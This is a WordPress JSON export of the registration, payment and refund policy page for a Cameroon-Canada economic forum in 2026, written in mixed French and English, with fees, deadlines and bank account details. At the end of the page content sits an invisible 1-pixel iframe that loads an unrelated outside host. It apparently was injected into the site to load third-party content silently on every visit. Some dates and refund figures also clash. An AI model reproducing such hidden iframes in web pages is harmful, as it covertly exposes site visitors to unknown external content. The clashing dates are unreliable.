{"id":888,"date":"2024-12-16T16:09:03","date_gmt":"2024-12-16T16:09:03","guid":{"rendered":"https:\/\/forecicc.com\/?page_id=888"},"modified":"2025-12-02T00:45:21","modified_gmt":"2025-12-02T00:45:21","slug":"usage-policy","status":"publish","type":"page","link":"https:\/\/forecicc.com\/en\/usage-policy\/","title":{"rendered":"Usage Policy"},"content":{"rendered":"<div data-elementor-type=\"wp-page\" data-elementor-id=\"888\" class=\"elementor elementor-888\">\n\t\t\t\t<div class=\"elementor-element elementor-element-343d1bda e-con-full e-flex e-con e-parent\" data-id=\"343d1bda\" data-element_type=\"container\" data-e-type=\"container\" data-settings=\"{&quot;background_background&quot;:&quot;classic&quot;}\">\n\t\t\t\t<div class=\"elementor-element elementor-element-4598e9ef elementor-widget elementor-widget-text-editor\" data-id=\"4598e9ef\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t\n<p><br \/><strong>REGISTRATION, CANCELLATION AND REFUND POLICY<\/strong><\/p>\n\n\n\n<p><strong>1. D\u00e9tails et calendrier de l\u2019inscription<\/strong><\/p>\n<p>Le nombre de places \u00e9tant limit\u00e9, les inscriptions seront accept\u00e9es selon le principe du premier arriv\u00e9, premier servi, sous r\u00e9serve du respect des crit\u00e8res et dates du calendrier d\u2019inscription ci-dessous.<\/p>\n<p>Pour participer aux visites d\u2019entreprises et aux ateliers de formation, assurez-vous de r\u00e9server votre place au moment de l\u2019inscription au Forum.<\/p>\n<figure class=\"wp-block-table\">\n<table class=\"has-fixed-layout\" style=\"height: 451px;\" width=\"490\">\n<tbody>\n<tr>\n<td><strong>ETAPE<\/strong><\/td>\n<td><strong>DEADLINE<\/strong><\/td>\n<\/tr>\n<tr>\n<td>Launch of the call for applications<\/td>\n<td>30 novembre 2025<\/td>\n<\/tr>\n<tr>\n<td>Deadline for submission of interest (online or by email)<\/td>\n<td>15 janvier 2026<\/td>\n<\/tr>\n<tr>\n<td><strong>1<sup>st<\/sup> Versement des frais d\u2019inscription (40%)<\/strong><\/td>\n<td>30 janvier 2026<\/td>\n<\/tr>\n<tr>\n<td>Submission of visa applications forms<\/td>\n<td>1<sup>st<\/sup> mars 2026<\/td>\n<\/tr>\n<tr>\n<td><strong>2<sup>nd\/rd<\/sup> Versement des frais d\u2019inscription (30%)<\/strong><\/td>\n<td>30 avril 2026<\/td>\n<\/tr>\n<tr>\n<td><strong>3<sup>nd\/rd<\/sup> Versement des frais d\u2019inscription (30%)<\/strong><\/td>\n<td>30 mai 2026<\/td>\n<\/tr>\n<tr>\n<td>Preparation of participants (online and face-to-face meetings)<\/td>\n<td>18 avril \u2013 18 mai 2026<\/td>\n<\/tr>\n<tr>\n<td><strong>Departure from Cameroon<\/strong><\/td>\n<td>8 juin 2026<\/td>\n<\/tr>\n<tr>\n<td><strong>Start of the Forum<\/strong><\/td>\n<td>10 juin 2026<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n\n\n\n<p><strong>2. Couverture M\u00e9diatique<\/strong><\/p>\n\n\n\n<p>Les organes de presse qui souhaitent assurer la couverture m\u00e9diatique au Forum doivent communiquer avec nous au forecicc@gmail.com. Pour toute question, veuillez communiquer avec l\u2019\u00e9quipe au forecicc@gmail.com. au <a href=\"mailto:forecicc@gmail.com\">forecicc@gmail.com<\/a>.<\/p>\n\n\n\n\n\n\n\n<h4 class=\"wp-block-heading\"><strong>3. Participants internationaux (PME \u2013 Cameroun et pays africains)<br \/><\/strong><\/h4>\n\n\n\n<p>Des lettres d\u2019invitation seront envoy\u00e9es exclusivement aux d\u00e9l\u00e9gu\u00e9s qui auront compl\u00e9t\u00e9 au moins la premi\u00e8re tranche des frais d\u2019inscription \u00e0 la date du 30 janvier 2026.<\/p>\n<p>&nbsp;<\/p>\n<p><strong>===&gt; Montant des frais d\u2019inscription pour les PME et municipalit\u00e9s d\u2019Afrique :<\/strong><br \/>Les participant.e.s des PME et municipalit\u00e9s africaines doivent verser la somme totale de trois millions francs CFA (3 000 000 FCFA par participant.e).<\/p>\n<p>&nbsp;<\/p>\n<p>Ces frais incluent les services suivants :<br \/>\u2022 Frais de visa ;<br \/>\u2022 Frais du stand d\u2019exposition-vente ;<br \/>\u2022 H\u00e9bergement pendant 10 jours (9 nuit\u00e9es) en chambre standard ;<br \/>\u2022 Repas pendant 10 jours (2 repas par jour) ;<br \/>\u2022 Transport \u00e0 partir de l\u2019a\u00e9roport et retour.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\"><strong>4. PME d\u00e9j\u00e0 enregistr\u00e9es au Canada<\/strong><\/h4>\n\n\n\n<p>Please register by following this link <a href=\"https:\/\/docs.google.com\/forms\/d\/1v2pqF9aNgQtXQfwEpYpNV0iCNfpo0qsw0OYw5_J260Y\/edit\">https:\/\/docs.google.com\/forms\/d\/1v2pqF9aNgQtXQfwEpYpNV0iCNfpo0qsw0OYw5_J260Y\/edit<\/a> or contact the Team by sending an email to <a href=\"mailto:forecicc@gmail.com\">forecicc@gmail.com<\/a>.<\/p>\n<p><strong>===&gt; Montant des frais d\u2019inscription pour les PME du Canada<\/strong><br \/>Ces PME paient exclusivement le prix du stand (100$ par jour) pour un total de 1000$. Celles qui d\u00e9sirent un h\u00e9bergement \u00e0 Toronto devront d\u00e9bourser en plus 300$ par jour. Ce montant inclus deux repas offerts par jour.<\/p>\n<p>&nbsp;<\/p>\n<p><strong>5. Entreprises publiques, fonctionnaires et grandes entreprises priv\u00e9es<\/strong><br \/>Les participants appartenant aux entreprises publiques, aux grandes entreprises priv\u00e9es ainsi que les fonctionnaires et agents publics doivent s\u2019acquitter des frais de <strong>six millions de francs CFA (6 000 000 FCFA)<\/strong> par participant. Ce montant inclut tous les services suivants :<br \/>\u2022 Frais de visa ;<br \/>\u2022 H\u00e9bergement pendant 10 jours (9 nuit\u00e9es) en chambre VIP ;<br \/>\u2022 Repas pendant 10 jours (2 repas par jour) ;<br \/>\u2022 Transport \u00e0 partir de l\u2019a\u00e9roport et retour ;<br \/>\u2022 Une entr\u00e9e pour un match du Mondial de football 2026 \u00e0 Toronto.<\/p>\n<p>Les frais de stand des entreprises et administrations publiques et des grandes entreprises priv\u00e9es sont n\u00e9goci\u00e9s avec le Comit\u00e9 d\u2019organisation.<\/p>\n<p><strong>6. Dispositions particuli\u00e8res<\/strong><br \/>Chaque participant.e doit pr\u00e9senter une carte de cr\u00e9dit pour sa caution \u00e0 l\u2019enregistrement \u00e0 l\u2019h\u00f4tel et est responsable de ses consommations au mini-bar et de toute autre d\u00e9pense engag\u00e9e \u00e0 titre personnel.<\/p>\n<p><br \/>Les tarifs ci-dessus peuvent \u00eatre ajust\u00e9s en fonction des besoins particuliers des participants, de chaque entreprise, municipalit\u00e9 ou administration. Par exemple, si un.e participant.e dispose d\u00e9j\u00e0 du visa canadien ou d\u2019un h\u00e9bergement, les frais y aff\u00e9rents seront retranch\u00e9s de sa facture.<\/p>\n\n\n\n<p><strong>7. Inscription de groupe<\/strong><\/p>\n\n\n\n<p>Les inscriptions de plusieurs personnes appartenant \u00e0 la m\u00eame PME, organisation, administration publique ou municipalit\u00e9 sont n\u00e9goci\u00e9es directement avec le Comit\u00e9 d\u2019organisation. Pour cela, veuillez \u00e9crire \u00e0 <a href=\"mailto:forecicc@gmail.com\">forecicc@gmail.com<\/a>.<\/p>\n\n\n\n<p><strong>8. Droits et privil\u00e8ges des personnes inscrites<\/strong><\/p>\n\n\n\n<p>Following registration, each person gains access to the rights and privileges associated with participation in the Forum, as described on the website.<\/p>\n\n\n\n<p>Les droits et privil\u00e8ges sont accord\u00e9s individuellement et ne peuvent \u00eatre partag\u00e9s avec d\u2019autres personnes. De plus, les remplacements ne sont pas permis apr\u00e8s le d\u00e9but du Forum.<\/p>\n<p>Les d\u00e9l\u00e9gu\u00e9es et d\u00e9l\u00e9gu\u00e9s peuvent se faire remplacer par une autre personne de leur organisation jusqu\u2019\u00e0 24 heures avant le d\u00e9but du Forum, \u00e0 condition que cela ne n\u00e9cessite pas de frais suppl\u00e9mentaires pour les organisatrices du Forum.<\/p>\n\n\n\n<p>To change the name of a participant, please send an email to <a href=\"mailto:forecicc@gmail.com\">forecicc@gmail.com<\/a> and request a replacement. If a registrant cannot be replaced, the cancellation\npolicy will apply.<\/p>\n<p><strong>9. Date limite pour s\u2019inscrire<\/strong><br \/>La date limite pour l\u2019inscription est le 30 janvier 2026, \u00e0 minuit (heure du Cameroun).<\/p>\n\n\n\n\n\n<p><strong>10. Paiements<\/strong><\/p>\n\n\n\n<p>Registration fees must be paid by the following means:<\/p>\n<ul>\n<li>Virement bancaire Interac effectu\u00e9 au Canada par courriel <a href=\"mailto:forecicc@gmail.com\">forecicc@gmail.com<\/a>;<\/li>\n<li>Effectuer un virement international directement au Canada sur le compte suivant :: <br \/><br \/>\n<figure class=\"wp-block-table\">\n<table class=\"has-fixed-layout\">\n<tbody>\n<tr>\n<td><strong>Bank\nCode<\/strong><\/td>\n<td><strong>Transit\nNumber<\/strong><\/td>\n<td><strong>Num\u00e9ro Compte<\/strong><\/td>\n<td><strong>SWIFT\nCode<\/strong><\/td>\n<td><strong>Business\nName and address<\/strong><\/td>\n<\/tr>\n<tr>\n<td>003<\/td>\n<td>01517<\/td>\n<td>008911<\/td>\n<td>ROYCCAT2<\/td>\n<td>ACXED Consulting, Inc. <br \/><strong>Address<\/strong> : 817, Mikinak RD Ottawa ON<br \/>K1K 4Z9 Canada<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<\/li>\n<li>Ou alors, effectuer un d\u00e9p\u00f4t ou un versement au Cameroun sur le compte suivant :: <br \/><br \/>\n<figure class=\"wp-block-table\">\n<table class=\"has-fixed-layout\">\n<tbody>\n<tr>\n<td><strong>Bank\nCode<\/strong><\/td>\n<td><strong>Transit\nNumber<\/strong><\/td>\n<td><strong>Num\u00e9ro Compte<\/strong><\/td>\n<td><strong>Cl\u00e9<\/strong><\/td>\n<td><strong>SWIFT\nCode<\/strong><\/td>\n<td><strong>Business\nName and address<\/strong><\/td>\n<\/tr>\n<tr>\n<td>100023<\/td>\n<td>00031<\/td>\n<td>13283013000<\/td>\n<td>06<\/td>\n<td>CRLYCMCXXX CAMEROUN<\/td>\n<td>DIFOUM NKONGO Catherine<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\nIBAN: CM21 1000 2000 3113 2830 1300 006 \u2013 SCB Cameroun Yaounde<\/li>\n<\/ul>\n\n\n\n<p>This payment must be made at the time of registration for it to be considered valid.<\/p>\n<p><strong>11. Confirmation d\u2019inscription<\/strong><\/p>\n\n\n\n<p>Once the full payment is made, you will send your proof of payment by email to <a href=\"mailto:forecicc@gmail.com\"><strong>forecicc@gmail.com<\/strong><\/a><strong>. <\/strong>You will then receive a registration confirmation by email.<\/p>\n\n\n\n<p><strong>12. Annulation<\/strong><\/p>\n\n\n\n<p>To cancel your registration to the Forum, you must send us an email at <a href=\"mailto:forecicc@gmail.com\">forecicc@gmail.com<\/a>. Les demandes d\u2019annulation faites par d\u2019autres moyens NE SERONT PAS accept\u00e9es. Les frais d\u2019annulation s\u2019appliqueront (25% du montant pay\u00e9).<\/p>\n\n\n\n<p><strong>13. Calendrier et pourcentage de remboursement<\/strong><\/p>\n\n\n\n<p>Le montant de votre remboursement d\u00e9pendra du moment o\u00f9 nous recevrons votre demande d\u2019annulation et du motif invoqu\u00e9. Veuillez consulter ce calendrier pour conna\u00eetre les diff\u00e9rents montants :<\/p>\n\n\n\n<figure class=\"wp-block-table\">\n<table class=\"has-fixed-layout\">\n<tbody>\n<tr>\n<td><br \/><strong>DATES TO RECEIVE CANCELLATION REQUEST<\/strong><\/td>\n<td><br \/><strong>REFUND<\/strong><\/td>\n<\/tr>\n<tr>\n<td><br \/>Au plus tard le <strong>20\u00a0 f\u00e9vrier<\/strong> 2026 (23 h 59, heure du Cameroun)<\/td>\n<td><br \/>95%<\/td>\n<\/tr>\n<tr>\n<td><br \/>Du 21 f\u00e9vrier au <strong>30 avril<\/strong> 2026 (23 h 59, heure du Cameroun)<\/td>\n<td><br \/>50%<\/td>\n<\/tr>\n<tr>\n<td><br \/>Du 1<sup>st<\/sup> mai au <strong>07 juin<\/strong> 2026 (23 h 59, heure du Cameroun)<\/td>\n<td><br \/>75% pour les cas de refus de visa et raison m\u00e9dicale justifi\u00e9e<br \/>25% pour les autres cas<\/td>\n<\/tr>\n<tr>\n<td><br \/>\u00c0 compter du<strong> 08 juin<\/strong> 2025 (23 h 59, heure du Cameroun)<\/td>\n<td><br \/>NO REFUND<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n\n\n\n<p>Les demandes d\u2019annulation pour cause de non-obtention du visa seront re\u00e7ues et trait\u00e9es avec diligence <strong>jusqu\u2019au 07 juin 2026<\/strong>. Dans ce cas sp\u00e9cifique, le d\u00e9l\u00e9gu\u00e9 recevra <strong>75%<\/strong> du remboursement de ses frais d\u2019inscription.<\/p>\n<p>Apr\u00e8s cette date, nous \u00e9valuerons EXCLUSIVEMENT les demandes de remboursement pour des raisons m\u00e9dicales et pour refus de visa. Pour demander un remboursement pour une raison m\u00e9dicale, veuillez joindre une lettre de votre m\u00e9decin. La date limite pour pr\u00e9senter ce type de demandes est le <strong>30 mai 2026<\/strong>.<\/p>\n<p>Nous n\u2019accordons pas de remboursement pour des absences non justifi\u00e9es, ni de remboursement partiel pour certaines activit\u00e9s du Forum auxquelles vous n\u2019avez pas pu assister. Cela inclut les d\u00e9placements, visites, repas et \u00e9v\u00e9nements dont le co\u00fbt est compris dans l\u2019enveloppe des frais d\u2019inscription.<\/p>\n<p>Tous les remboursements sont effectu\u00e9s au plus tard, 10 jours apr\u00e8s la fin du Forum, sur la carte de cr\u00e9dit initialement utilis\u00e9e pour le paiement ou par virement bancaire dans le compte utilis\u00e9 pour le paiement, en retenant les frais bancaires. La mention suivante appara\u00eetra sur le relev\u00e9 de carte de cr\u00e9dit ou du compte bancaire une fois le remboursement effectu\u00e9 : FORECICC \u2013 REFUND.<\/p>\n<p><strong>Le Comit\u00e9 d\u2019organisation<\/strong><br \/><strong>FORECICC2026<\/strong><\/p>\n\n\n\n\n\n<p>&nbsp;<\/p>\n\n\n\n<div class=\"wp-block-uagb-container uagb-block-e5c3ac7a alignfull uagb-is-root-container\">\n<div class=\"uagb-container-inner-blocks-wrap\">\u00a0<\/div>\n<\/div>\n\n\n\n<div class=\"wp-block-uagb-container uagb-block-ff5e069a alignfull uagb-is-root-container\">\n<div class=\"uagb-container-inner-blocks-wrap\">\u00a0<\/div>\n<\/div>\n\n\n\n<p>&nbsp;<\/p>\n\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>","protected":false},"excerpt":{"rendered":"<p>POLITIQUE D\u2019INSCRIPTION, D\u2019ANNULATION ET DE REMBOURSEMENT 1. D\u00e9tails et calendrier de l\u2019inscription Le nombre de places \u00e9tant limit\u00e9, les inscriptions seront accept\u00e9es selon le principe du premier arriv\u00e9, premier servi, sous r\u00e9serve du respect des crit\u00e8res et dates du calendrier d\u2019inscription ci-dessous. Pour participer aux visites d\u2019entreprises et aux ateliers de formation, assurez-vous de r\u00e9server [&hellip;]<\/p>","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_uag_custom_page_level_css":"","footnotes":""},"class_list":["post-888","page","type-page","status-publish","hentry"],"aioseo_notices":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v24.3 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Usage Policy - FORECICC<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/forecicc.com\/en\/usage-policy\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Usage Policy - FORECICC\" \/>\n<meta property=\"og:description\" content=\"POLITIQUE D\u2019INSCRIPTION, D\u2019ANNULATION ET DE REMBOURSEMENT 1. D\u00e9tails et calendrier de l\u2019inscription Le nombre de places \u00e9tant limit\u00e9, les inscriptions seront accept\u00e9es selon le principe du premier arriv\u00e9, premier servi, sous r\u00e9serve du respect des crit\u00e8res et dates du calendrier d\u2019inscription ci-dessous. Pour participer aux visites d\u2019entreprises et aux ateliers de formation, assurez-vous de r\u00e9server [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/forecicc.com\/en\/usage-policy\/\" \/>\n<meta property=\"og:site_name\" content=\"FORECICC\" \/>\n<meta property=\"article:modified_time\" content=\"2025-12-02T00:45:21+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"7 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/forecicc.com\/usage-policy\/\",\"url\":\"https:\/\/forecicc.com\/usage-policy\/\",\"name\":\"Usage Policy - FORECICC\",\"isPartOf\":{\"@id\":\"https:\/\/forecicc.com\/#website\"},\"datePublished\":\"2024-12-16T16:09:03+00:00\",\"dateModified\":\"2025-12-02T00:45:21+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/forecicc.com\/usage-policy\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/forecicc.com\/usage-policy\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/forecicc.com\/usage-policy\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/forecicc.com\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Usage Policy\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/forecicc.com\/#website\",\"url\":\"https:\/\/forecicc.com\/\",\"name\":\"FORECICC\",\"description\":\"FORUM \u00c9CONOMIQUE INTERNATIONAL CAMEROUN-CANADA\",\"publisher\":{\"@id\":\"https:\/\/forecicc.com\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/forecicc.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/forecicc.com\/#organization\",\"name\":\"FORECICC\",\"url\":\"https:\/\/forecicc.com\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/forecicc.com\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/forecicc.com\/wp-content\/uploads\/2024\/12\/cropped-1_LOGO_FORUM_BLACK_FR-Sans-fond-Croped.png\",\"contentUrl\":\"https:\/\/forecicc.com\/wp-content\/uploads\/2024\/12\/cropped-1_LOGO_FORUM_BLACK_FR-Sans-fond-Croped.png\",\"width\":301,\"height\":314,\"caption\":\"FORECICC\"},\"image\":{\"@id\":\"https:\/\/forecicc.com\/#\/schema\/logo\/image\/\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Usage Policy - FORECICC","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/forecicc.com\/en\/usage-policy\/","og_locale":"en_US","og_type":"article","og_title":"Usage Policy - FORECICC","og_description":"POLITIQUE D\u2019INSCRIPTION, D\u2019ANNULATION ET DE REMBOURSEMENT 1. D\u00e9tails et calendrier de l\u2019inscription Le nombre de places \u00e9tant limit\u00e9, les inscriptions seront accept\u00e9es selon le principe du premier arriv\u00e9, premier servi, sous r\u00e9serve du respect des crit\u00e8res et dates du calendrier d\u2019inscription ci-dessous. Pour participer aux visites d\u2019entreprises et aux ateliers de formation, assurez-vous de r\u00e9server [&hellip;]","og_url":"https:\/\/forecicc.com\/en\/usage-policy\/","og_site_name":"FORECICC","article_modified_time":"2025-12-02T00:45:21+00:00","twitter_card":"summary_large_image","twitter_misc":{"Est. reading time":"7 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/forecicc.com\/usage-policy\/","url":"https:\/\/forecicc.com\/usage-policy\/","name":"Usage Policy - FORECICC","isPartOf":{"@id":"https:\/\/forecicc.com\/#website"},"datePublished":"2024-12-16T16:09:03+00:00","dateModified":"2025-12-02T00:45:21+00:00","breadcrumb":{"@id":"https:\/\/forecicc.com\/usage-policy\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/forecicc.com\/usage-policy\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/forecicc.com\/usage-policy\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/forecicc.com\/"},{"@type":"ListItem","position":2,"name":"Usage Policy"}]},{"@type":"WebSite","@id":"https:\/\/forecicc.com\/#website","url":"https:\/\/forecicc.com\/","name":"FORECICC","description":"INTERNATIONAL ECONOMIC FORUM CAMEROON-CANADA","publisher":{"@id":"https:\/\/forecicc.com\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/forecicc.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/forecicc.com\/#organization","name":"FORECICC","url":"https:\/\/forecicc.com\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/forecicc.com\/#\/schema\/logo\/image\/","url":"https:\/\/forecicc.com\/wp-content\/uploads\/2024\/12\/cropped-1_LOGO_FORUM_BLACK_FR-Sans-fond-Croped.png","contentUrl":"https:\/\/forecicc.com\/wp-content\/uploads\/2024\/12\/cropped-1_LOGO_FORUM_BLACK_FR-Sans-fond-Croped.png","width":301,"height":314,"caption":"FORECICC"},"image":{"@id":"https:\/\/forecicc.com\/#\/schema\/logo\/image\/"}}]}},"uagb_featured_image_src":{"full":false,"thumbnail":false,"medium":false,"medium_large":false,"large":false,"1536x1536":false,"2048x2048":false,"trp-custom-language-flag":false,"depicter-thumbnail":false},"uagb_author_info":{"display_name":"katenkongo@gmail.com","author_link":"https:\/\/forecicc.com\/en\/author\/katenkongogmail-com\/"},"uagb_comment_info":0,"uagb_excerpt":"POLITIQUE D\u2019INSCRIPTION, D\u2019ANNULATION ET DE REMBOURSEMENT 1. D\u00e9tails et calendrier de l\u2019inscription Le nombre de places \u00e9tant limit\u00e9, les inscriptions seront accept\u00e9es selon le principe du premier arriv\u00e9, premier servi, sous r\u00e9serve du respect des crit\u00e8res et dates du calendrier d\u2019inscription ci-dessous. Pour participer aux visites d\u2019entreprises et aux ateliers de formation, assurez-vous de r\u00e9server&hellip;","_links":{"self":[{"href":"https:\/\/forecicc.com\/en\/wp-json\/wp\/v2\/pages\/888","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/forecicc.com\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/forecicc.com\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/forecicc.com\/en\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/forecicc.com\/en\/wp-json\/wp\/v2\/comments?post=888"}],"version-history":[{"count":53,"href":"https:\/\/forecicc.com\/en\/wp-json\/wp\/v2\/pages\/888\/revisions"}],"predecessor-version":[{"id":1631,"href":"https:\/\/forecicc.com\/en\/wp-json\/wp\/v2\/pages\/888\/revisions\/1631"}],"wp:attachment":[{"href":"https:\/\/forecicc.com\/en\/wp-json\/wp\/v2\/media?parent=888"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}